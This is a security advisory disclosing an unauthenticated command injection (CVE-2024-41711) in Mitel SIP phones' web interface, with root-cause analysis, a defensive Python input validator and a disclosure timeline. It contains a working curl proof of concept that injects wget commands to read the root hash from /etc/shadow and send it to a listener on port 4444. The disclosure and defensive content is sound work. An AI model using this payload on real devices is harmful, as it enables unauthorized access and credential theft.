Security Advisory: Unauthenticated Command Injection in Mitel IP Phones

Denys Vozniuk
Security Consultant

Summary

The Mitel Series SIP Phones web administration interface executes an unauthenticated OS command constructed with unsanitized user input.

Affected Manufacturer: Mitel

Model: Mitel-6800/6900/6900w/6970

Versions: R6.4.0.HF1 (R6.4.0.136) and earlier

CVEs: CVE-2024-41711

Impact (CVSS): 8.8 (high) - AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Systems

  • Mitel 6800 Series SIP Phones: R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6900 Series SIP Phones: R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6900w Series SIP Phone: R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6970 Conference Unit: R6.4.0.HF1 (R6.4.0.136) and earlier

Impact

By successfully exploiting this flaw, a remote unauthenticated attacker can execute arbitrary commands on the device with elevated privileges.

Description

The "webconfig" CGI binary implements the web administration interface and relies on an outdated method of input parsing. It is executed as a CGI binary by the HTTPD web server, which is started with the command:

/usr/sbin/httpd -h /webroot

This interface, which includes the “Ethernet Settings” page, processes user data without validation: any input (strings, numbers, or special characters) is accepted and copied directly into configuration files. When the user clicks “Save”, all entered data is written to the config file /nvdata/etc/enet.cfg and applied within the operating system as environment settings with the highest priority by the if_setup.sh up script. Additionally, a concatenation bug appends strings to the config file, which lets an attacker bypass string length restrictions (further details below).

Proof-Of-Concept

For this proof of concept, we craft an exploit that allows an attacker to read the root hash from the shadow file. To demonstrate both the command injection and the string length bypass, we use the parameters “Router IP Address” and “Domain Name” for the attack, though an attacker could leverage any suitable parameter for the payload. Here, we enter the command injection payload via the web interface, split into two parts.

After pressing “Save”, you can see the following request being sent:

An attacker listening on port "4444" will receive the root hash string.

The config file /nvdata/etc/enet.cfg will then look like this:

Use the following curl command for testing, updating the IP address and Host address as needed—from “127.0.0.1” to the router’s IP address and the attacker's machine wher.

curl -i -s -k -X $'POST' \
  -H $'Host: 127.0.0.1' -H $'Content-Length: 344' \
  --data-binary $'\x0d\x0aMAIN%2FENETCFG_DHCP=on&MAIN%2FENETCFG_IPADDR=&MAIN%2FENETCFG_SUBNET=255.255.254.0&MAIN%2FENETCFG_ROUTER=%3Bwget+http%3A%2F%2F127.0.0.1&MAIN%2FENETCFG_DOMAIN=1%3A4444%2Fvers%3D%60wget+127.0.0.1%3A4444%2Fver%3D%5C%60grep+root+%2Fetc%2Fshadow%5C%60%60&MAIN%2FENETCFG_DNS1=10.136.128.11&MAIN%2FENETCFG_DNS2=1.1.1.1&MAIN%2FENETCFG_DNS3=10.10.10.10' \
  $'http://127.0.0.1/cgi-bin/webconfig?page=enetcfg&action=submit'
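The root cause is that the enetcfg handler writes field values into a shell-sourced config without checking their type. As an added example (not Mitel's code and not part of the original advisory), the following Python decodes a webconfig form body like the request above and reports every field whose value is not the IPv4 address or hostname that field is supposed to hold; the ROUTER and DOMAIN values from the proof of concept fail these checks because shell metacharacters cannot appear in either type. Field names are taken from the request; the exact strictness of each check is an assumption.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Constructed sample: the form body from the curl command above, without the
# leading CRLF, so the checker can be exercised offline.
SAMPLE_BODY = (
    "MAIN%2FENETCFG_DHCP=on&MAIN%2FENETCFG_IPADDR=&MAIN%2FENETCFG_SUBNET=255.255.254.0"
    "&MAIN%2FENETCFG_ROUTER=%3Bwget+http%3A%2F%2F127.0.0.1"
    "&MAIN%2FENETCFG_DOMAIN=1%3A4444%2Fvers%3D%60wget+127.0.0.1%3A4444%2Fver%3D"
    "%5C%60grep+root+%2Fetc%2Fshadow%5C%60%60"
    "&MAIN%2FENETCFG_DNS1=10.136.128.11&MAIN%2FENETCFG_DNS2=1.1.1.1"
    "&MAIN%2FENETCFG_DNS3=10.10.10.10"
)

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens only.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def _is_ipv4(value: str) -> bool:
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def _ipv4_or_empty(value: str) -> bool:
    return value == "" or _is_ipv4(value)


# Expected type per field (assumed: what the Ethernet Settings page semantically holds).
FIELD_CHECKS = {
    "MAIN/ENETCFG_DHCP": lambda v: v in ("on", "off"),
    "MAIN/ENETCFG_IPADDR": _ipv4_or_empty,
    "MAIN/ENETCFG_SUBNET": _is_ipv4,
    "MAIN/ENETCFG_ROUTER": _ipv4_or_empty,
    "MAIN/ENETCFG_DOMAIN": lambda v: v == "" or bool(_HOSTNAME_RE.match(v)),
    "MAIN/ENETCFG_DNS1": _ipv4_or_empty,
    "MAIN/ENETCFG_DNS2": _ipv4_or_empty,
    "MAIN/ENETCFG_DNS3": _ipv4_or_empty,
}


def validate_enetcfg(body: str) -> dict:
    """Decode a webconfig form body and return {field: decoded value} for every
    field that fails its type check. Unknown fields are rejected as well, since the
    handler should only ever write known keys. An empty dict means the save is safe."""
    rejected = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        check = FIELD_CHECKS.get(name)
        for value in values:
            if check is None or not check(value):
                rejected[name] = value
    return rejected
```

A handler built on this should refuse the whole save when the returned dict is non-empty rather than dropping the bad field, and the same check run over captured POST bodies to /cgi-bin/webconfig?page=enetcfg gives a simple detection for exploitation attempts.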

Takeaways

This vulnerability highlights the significant security risk of web administration interfaces that use outdated input parsing methods. The high CVSS score (8.8) underlines the critical nature of the flaw, which allows unauthenticated remote attackers to execute arbitrary commands with elevated privileges.

If you manage or use Mitel SIP phones—or any networked devices with embedded web interfaces—it's essential to assess and test your firmware for similar issues. This includes scanning for unvalidated user input and command injection points. Organizations should regularly review and update device firmware and implement strong input sanitization to prevent unauthorized system access and data breaches.

Timeline

  • 2024-02-27: Vulnerability identified
  • 2024-03-28: Sent coordinated disclosure request to PSIRT@mitel.com
  • 2024-03-28: Received guidance on the secure communication channel from vendor
  • 2024-04-09: Sent vulnerability disclosure report to the vendor through secure communication channel
  • 2024-04-09: Vendor responded and started analysis
  • 2024-05-01: Vendor responded that we were using an old version and that we needed to test on version 6.4 to prove the findings
  • 2024-05-14: We received the latest version 6.4 and found that the findings still exist
  • 2024-05-21: We shared an update for the new version with proof-of-concepts for the findings
  • 2024-05-21: Vendor responded and started analysis
  • 2024-06-21: Vendor confirmed the “Unauthenticated Command Injection” findings and started working on a new release; we agreed to wait for the vendor's release and advisory
  • 2024-07-17: Vendor published Security Advisory 24-0020 for the found issue
  • 2024-07-30: Vendor provided the CVE number: CVE-2024-41711